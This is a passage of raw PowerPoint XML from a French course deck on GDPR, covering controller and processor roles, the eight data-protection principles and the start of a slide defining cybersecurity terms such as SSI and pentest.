                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>l’établissement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="ZoneTexte 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8187CCF6-6A0D-4D6D-A8CB-FE09DBA4CDC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2695922" y="4909202"/>
            <a:ext cx="1070485" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Critère de</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ciblage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3329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10"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ntr" presetSubtype="0"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36" grpId="0"/>
      <p:bldP spid="39" grpId="0"/>
      <p:bldP spid="52" grpId="0" animBg="1"/>
      <p:bldP spid="57" grpId="0"/>
      <p:bldP spid="5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49C99A08-B528-48B3-8C7E-F1D5ABDB7A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89080" y="2710035"/>
            <a:ext cx="5202920" cy="4161587"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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695324" y="897754"/>
            <a:ext cx="11385514" cy="1049380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Responsable de traitement et Sous-traitant</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 8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695323" y="2120987"/>
            <a:ext cx="10557176" cy="4089314"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Un traitement de données peut être mis en œuvre par un organisme pour son propre compte, soit pour le compte et sur instruction d’un autre organisme</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Responsable de Traitement (RT) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FINALITE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = Déterminer le « pourquoi » / objectifs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MOYENS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = Déterminer le « comment »</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>OU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Sous-Traitant (ST)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Traiter les données pour le compte du RT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Respecter les instructions du RT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="159184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2FB68C-7899-F5E0-ED0F-7D237B0F8372}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>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A57AEA5C-F2E9-DB0C-5CA5-D396113E0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space réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C76D09C-96CE-DCB6-AFD1-B95E8AEFB28F}"/>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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{014A658B-41F0-8EA7-6F30-1913D6CC8DF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695324" y="897754"/>
            <a:ext cx="11385514" cy="1049380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les CONTRAINTES au développement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="82" name="Straight Connector 81">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72A10CE4-9AFA-6FEF-1CF8-B60FE773A6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Espace réservé du contenu 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7B55E32-7339-A6AD-1113-32CC3FA232E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.linkedin.com/posts/emmanuelmacron_les-etats-unis-ont-les-gafa-google-apple-activity-6742509736903614464-oc_A/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Les Etats-Unis ont les GAFA (Google, Apple, Facebook et Amazon), la Chine a les BATX (Baidu, Alibaba, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Tencent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> et Xiaomi). Et l’Europe ? Nous avons le RGPD. Il est temps d’avoir notre propre souveraineté technologique et de ne pas dépendre uniquement des solutions américaines ou chinoises !</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1448715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FB68C-7899-F5E0-ED0F-7D237B0F8372}"/>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C76D09C-96CE-DCB6-AFD1-B95E8AEFB28F}"/>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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{014A658B-41F0-8EA7-6F30-1913D6CC8DF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695324" y="897754"/>
            <a:ext cx="11385514" cy="1049380"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>RGPD – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>WOOCLAP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Espace réservé du contenu 4" descr="Une image contenant texte, capture d’écran, Police, conception&#10;&#10;Description générée automatiquement">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4557EB4E-09F3-6D13-0A37-7362D8103D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8966" y="1555158"/>
            <a:ext cx="9814067" cy="4983754"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3916570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9" name="Rectangle 13">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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9172AB4-C6FC-4961-B1EA-A0CFA901521A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="800102" y="960594"/>
            <a:ext cx="5828114" cy="4936812"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="5400" b="1" cap="none" dirty="0"/>
              <a:t>Principes de Protection des Données</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="5400" cap="none" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Straight Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA98CE3-81A7-4FFE-A047-9AA65998D8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315200" y="1733549"/>
            <a:ext cx="0" cy="339090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CB168234-A469-4822-AFD0-DACF9AD0001C}"/>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latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="90000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="270509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590F21-A5BA-477C-9A35-42D4375D745E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Principes de Protection des Données – </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les 8 règles d’or</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B945736-D24E-4303-8E49-555FA194C19F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="2293126"/>
            <a:ext cx="10691265" cy="4161462"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Finalité du traitement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Licéité du traitement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Minimisation des données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Protection particulière des données sensibles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conservation limitée des données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Obligation de sécurité</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Transparence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Droits des personnes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du numéro de diapositive 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41F4EC6A-70FF-4B67-8ED3-0994A153E305}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C3DB2ADC-AF19-4574-8C10-79B5B04FCA27}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150437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BD7A0-F8AB-EF66-0D98-0F0F85C5275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9DCF835-80DE-92A1-BB1A-3445D4A041B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Généralités – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Rappels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6277C1D0-5858-36E1-3FC3-535D3951A9CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="700635" y="2293126"/>
            <a:ext cx="10890731" cy="3636088"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Définition des termes : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Cybersécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> vs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>cyberdéfense</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>SSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Dans un contexte professionnel :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ne dites plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>cybersécurité</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>, mais </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>SSI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:srgbClr val="0070C0"/>
              </a:buClr>
              <a:buSzPct val="150000"/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>ne dites plus </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>hacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> mais </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1"/>
              <a:t>pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> !</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
